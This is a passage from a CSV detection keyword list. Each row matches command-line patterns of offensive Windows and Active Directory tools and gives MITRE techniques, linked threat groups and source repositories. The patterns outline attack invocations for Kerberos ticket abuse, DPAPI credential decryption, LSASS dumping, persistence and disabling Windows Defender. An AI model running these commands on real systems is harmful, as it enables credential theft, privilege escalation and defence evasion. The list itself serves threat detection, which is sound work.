checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4573" "*.exe ps /target:C:\Temp\* /unprotect*",".{0,1000}\.exe\sps\s\/target\:C\:\\Temp\\.{0,1000}\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4574" "*.exe ptt /ticket:*",".{0,1000}\.exe\sptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4575" "*.exe ptt /ticket:*.kirbi",".{0,1000}\.exe\sptt\s\/ticket\:.{0,1000}\.kirbi","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","4576" "*.exe -ptt ticket:*.kirbi*",".{0,1000}\.exe\s\-ptt\sticket\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","4577" "*.exe --pwsh *.ps1 *.exe*",".{0,1000}\.exe\s\-\-pwsh\s.{0,1000}\.ps1\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4578" "*.exe -q InterestingProcesses*",".{0,1000}\.exe\s\-q\sInterestingProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4579" "*.exe -q PowerShell*",".{0,1000}\.exe\s\-q\sPowerShell.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4580" "*.exe -q WindowsDefender*",".{0,1000}\.exe\s\-q\sWindowsDefender.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","4581" "*.exe RBCD -action read -delegate-to *",".{0,1000}\.exe\sRBCD\s\-action\sread\s\-delegate\-to\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4582" "*.exe rbcd -m * -p * -c *cmd.exe*",".{0,1000}\.exe\srbcd\s\-m\s.{0,1000}\s\-p\s.{0,1000}\s\-c\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","4583" "*.exe rdg /unprotect*",".{0,1000}\.exe\srdg\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4584" "*.exe RegistryAutoLogons*",".{0,1000}\.exe\sRegistryAutoLogons.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4585" "*.exe RegistryAutoruns*",".{0,1000}\.exe\sRegistryAutoruns.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4586" "*.exe relay -Domain * -CreateNewComputerAccount *",".{0,1000}\.exe\srelay\s\-Domain\s.{0,1000}\s\-CreateNewComputerAccount\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","4587" "*.exe --remove-reparse --source-file *.exe*",".{0,1000}\.exe\s\-\-remove\-reparse\s\-\-source\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","4588" "*.exe -s * -c service_mod *",".{0,1000}\.exe\s\-s\s.{0,1000}\s\-c\sservice_mod\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote 
systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","4589" "*.exe -s *\x*\x*\x*",".{0,1000}\.exe\s\-s\s.{0,1000}\\x.{0,1000}\\x.{0,1000}\\x.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","0","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","4590" "*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*",".{0,1000}\.exe\ss4u\s\/ticket\:.{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4594" "*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*",".{0,1000}\.exe\ss4u\s\/user\:.{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/altservice\:ldap\s\/ptt\s\/rc4.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus access the LDAP service on the DC (for dcsync)","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4595" "*.exe --sample-size 1000 --mode 0 --targets 
dirs.txt*",".{0,1000}\.exe\s\-\-sample\-size\s1000\s\-\-mode\s0\s\-\-targets\sdirs\.txt.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","4596" "*.exe --sample-size 1000 --mode 1 --targets exts.txt*",".{0,1000}\.exe\s\-\-sample\-size\s1000\s\-\-mode\s1\s\-\-targets\sexts\.txt.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","4597" "*.exe --schedule * *.exe*",".{0,1000}\.exe\s\-\-schedule\s.{0,1000}\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4602" "*.exe --screensaver *:\*.exe*",".{0,1000}\.exe\s\-\-screensaver\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4603" "*.exe Search Find-Persist*",".{0,1000}\.exe\sSearch\sFind\-Persist.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","4604" "*.exe -selfcert -laddr 0.0.0.0:*",".{0,1000}\.exe\s\-selfcert\s\-laddr\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","4605" "*.exe --session=2 --shadow --console*",".{0,1000}\.exe\s\-\-session\=2\s\-\-shadow\s\-\-console.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","4606" "*.exe --set-reparse override --source-file *.exe --target-file *",".{0,1000}\.exe\s\-\-set\-reparse\soverride\s\-\-source\-file\s.{0,1000}\.exe\s\-\-target\-file\s.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","4607" "*.exe shadowcred -c * -f*",".{0,1000}\.exe\sshadowcred\s\-c\s.{0,1000}\s\-f.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","4609" "*.exe --showstats -c *\cache.txt*",".{0,1000}\.exe\s\-\-showstats\s\-c\s.{0,1000}\\cache\.txt.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","4610" "*.exe --signature --driver*",".{0,1000}\.exe\s\-\-signature\s\-\-driver.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","4611" "*.exe silver /sids:*/target:*",".{0,1000}\.exe\ssilver\s\/sids\:.{0,1000}\/target\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","4612" "*.exe -sniffer n*",".{0,1000}\.exe\s\-sniffer\sn.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","4613" "*.exe spawn -m rbcd -d 
*",".{0,1000}\.exe\sspawn\s\-m\srbcd\s\-d\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Back Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4614" "*.exe spawn -m rbcd -d *",".{0,1000}\.exe\sspawn\s\-m\srbcd\s\-d\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4615" "*.exe spawn -m shadowcred -d *",".{0,1000}\.exe\sspawn\s\-m\sshadowcred\s\-d\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Back Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4616" "*.exe spawn -m shadowcred -d 
*",".{0,1000}\.exe\sspawn\s\-m\sshadowcred\s\-d\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4617" "*.exe -spn * -redirecthost *",".{0,1000}\.exe\s\-spn\s.{0,1000}\s\-redirecthost\s.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","4618" "*.exe --spn --domain * --user * --pass *",".{0,1000}\.exe\s\-\-spn\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","4619" "*.exe spy --pid *",".{0,1000}\.exe\sspy\s\-\-pid\s.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","4620" "*.exe spy --window 
*",".{0,1000}\.exe\sspy\s\-\-window\s.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","4621" "*.exe --startup *:\*.exe*",".{0,1000}\.exe\s\-\-startup\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4622" "*.exe -t keepass -f *",".{0,1000}\.exe\s\-t\skeepass\s\-f\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","4624" "*.exe -t startupfolder -c * -a * -f*",".{0,1000}\.exe\s\-t\sstartupfolder\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-f.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","4625" "*.exe -t tortoisesvn -c * -a * -m*",".{0,1000}\.exe\s\-t\stortoisesvn\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-m.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - 
TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","4626" "*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*",".{0,1000}\.exe\s\-t\swl\-extract\.dll\s\-d\s.{0,1000}\.dat\s\-r\s.{0,1000}\.rsa\s\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","4627" "*.exe --targettask * --targetbinary *",".{0,1000}\.exe\s\-\-targettask\s.{0,1000}\s\-\-targetbinary\s\s.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","4628" "*.exe tgtdeleg*",".{0,1000}\.exe\stgtdeleg.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","4629" "*.exe TokenPrivileges*",".{0,1000}\.exe\sTokenPrivileges.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4630" "*.exe triage",".{0,1000}\.exe\striage","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4631" "*.exe triage /password:*",".{0,1000}\.exe\striage\s\/password\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4632" "*.exe -u * -s 2 -c cmd.exe*",".{0,1000}\.exe\s\-u\s.{0,1000}\s\-s\s2\s\-c\scmd\.exe.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","4633" "*.exe -U:T icacls *",".{0,1000}\.exe\s\-U\:T\sicacls\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","4634" "*.exe -U:T takeown 
/f*\smartscreen.exe*",".{0,1000}\.exe\s\-U\:T\stakeown\s\/f.{0,1000}\\smartscreen\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","4635" "*.exe -uac",".{0,1000}\.exe\s\-uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","4636" "*.exe UnattendedInstallFiles*",".{0,1000}\.exe\sUnattendedInstallFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4637" "*.exe UnquotedServicePath*",".{0,1000}\.exe\sUnquotedServicePath.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4638" "*.exe -v -u * -w 10k-most-common.txt*",".{0,1000}\.exe\s\-v\s\-u\s.{0,1000}\s\-w\s10k\-most\-common\.txt.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","0","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","4639" "*.exe -w *.dll -l TEMP -p true -d 4096 -s user,pass*",".{0,1000}\.exe\s\-w\s.{0,1000}\.dll\s\-l\sTEMP\s\-p\strue\s\-d\s4096\s\-s\suser,pass.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & 